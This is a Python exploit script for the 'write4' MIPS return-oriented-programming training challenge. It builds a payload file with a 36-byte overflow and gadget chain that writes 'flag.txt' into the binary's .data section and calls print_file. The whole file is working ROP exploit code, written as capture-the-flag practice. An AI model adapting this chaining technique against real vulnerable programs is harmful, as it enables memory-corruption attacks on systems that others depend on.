#!/usr/bin/python3
"""Exploit for write4 MIPS."""
import argparse
import pathlib
import struct
import sys
# ROP gadgets (disassembly as recorded in the original listing)
#
#   0x00400930 <+0>:  lw   t9,12(sp)
#   0x00400934 <+4>:  lw   t0,8(sp)
#   0x00400938 <+8>:  lw   t1,4(sp)
#   0x0040093c <+12>: sw   t1,0(t0)
#   0x00400940 <+16>: jalr t9
#   0x00400944 <+20>: addi sp,sp,16
#
# Loads a value (t1) and a destination (t0) from the stack, stores the
# value at that destination, jumps to the address loaded into t9 and pops
# the 16-byte frame.
WRITE4_GADGET = 0x400930

#   0x00400948 <+24>: lw   a0,8(sp)
#   0x0040094c <+28>: lw   t9,4(sp)
#   0x00400950 <+32>: jalr t9
#   0x00400954 <+36>: nop
#
# Loads the first call argument (a0) and a jump target (t9) from the
# stack and jumps to the target.
PRINT_FILE_GADGET = 0x400948

# ELF sections
# .data section; the chain stores the filename string here.
DATA_SECTION = 0x411550

# print_file() func call
PRINT_FILE = 0x400a90
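def build_write4_gadget(addr, data):
    """Build one 16-byte link of the ROP chain that stores ``data`` at ``addr``.

    The link is laid out for the write gadget at ``WRITE4_GADGET``
    (``lw t9,12(sp); lw t0,8(sp); lw t1,4(sp); sw t1,0(t0); jalr t9;
    addi sp,sp,16``). The chain in ``main()`` relies on the word following
    the gadget address being at 0(sp) once the gadget runs:

        +0   WRITE4_GADGET   address the previous link jumps to (for the
                             first link: the overwritten return address)
        +4   filler          0(sp), never read by the gadget
        +8   data            4(sp) -> t1, the word to store
        +12  addr            8(sp) -> t0, where to store it

    12(sp) -> t9, the next gadget address, is the first word of whatever
    the caller appends after this link, so links chain back to back.
    Words are packed little-endian (``'<I'``), like the rest of the chain.

    Args:
        addr: 32-bit destination address of the store.
        data: up to 4 bytes to store; shorter input is NUL-padded to a full
            word so the link keeps its 16-byte layout.

    Returns:
        The 16-byte link as ``bytes``.

    Raises:
        ValueError: if ``data`` is longer than 4 bytes.
    """
    if len(data) > 4:
        raise ValueError('data is longer than 4 bytes')
    # The gadget stores a whole 32-bit word; a short value would shift the
    # address and the next gadget out of their slots. NUL padding keeps a
    # written string terminated.
    word = data.ljust(4, b'\x00')
    return b''.join([
        struct.pack('<I', WRITE4_GADGET),
        b'B' * 4,
        word,
        struct.pack('<I', addr),
    ])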
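def main(argv=sys.argv):
    """Build the ROP chain and write it to the payload file.

    Args:
        argv: command-line vector; ``argv[0]`` is the program name and is
            skipped, so ``main()`` and ``main(sys.argv)`` behave alike.

    Returns:
        0 once the payload file has been written.
    """
    parser = argparse.ArgumentParser(
        description='Exploit for write4 MIPS'
    )
    parser.add_argument(
        'payload_file',
        type=pathlib.Path,
        default=pathlib.Path('payload.bin'),
        nargs='?',
        help='Path to write payload file to'
    )
    # Parse the vector we were given instead of the implicit sys.argv, so
    # callers can pass an explicit argument list.
    args = parser.parse_args(argv[1:])

    # 36 bytes of filler precede the first gadget address; presumably this
    # reaches the saved return address of the vulnerable function.
    buf = b'A' * 36
    # Store the NUL-terminated string "flag.txt" in the .data section, one
    # 4-byte word per link. (The stored string is the filename handed to
    # print_file(), not a shell command.)
    buf += build_write4_gadget(DATA_SECTION, b'flag')
    buf += build_write4_gadget(DATA_SECTION + 4, b'.txt')
    buf += build_write4_gadget(DATA_SECTION + 8, b'\x00' * 4)
    # Final link: PRINT_FILE_GADGET loads t9 <- PRINT_FILE from 4(sp) and
    # a0 <- DATA_SECTION from 8(sp), then jumps, i.e. calls
    # print_file(DATA_SECTION). The 'C' word sits at 0(sp) and is unused.
    buf += struct.pack('<I', PRINT_FILE_GADGET)
    buf += b'C' * 4
    buf += struct.pack('<I', PRINT_FILE)
    buf += struct.pack('<I', DATA_SECTION)

    with args.payload_file.open(mode='wb') as fobj:
        fobj.write(buf)
    return 0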
if __name__ == '__main__':
    # Propagate main()'s return value as the process exit status.
    raise SystemExit(main(sys.argv))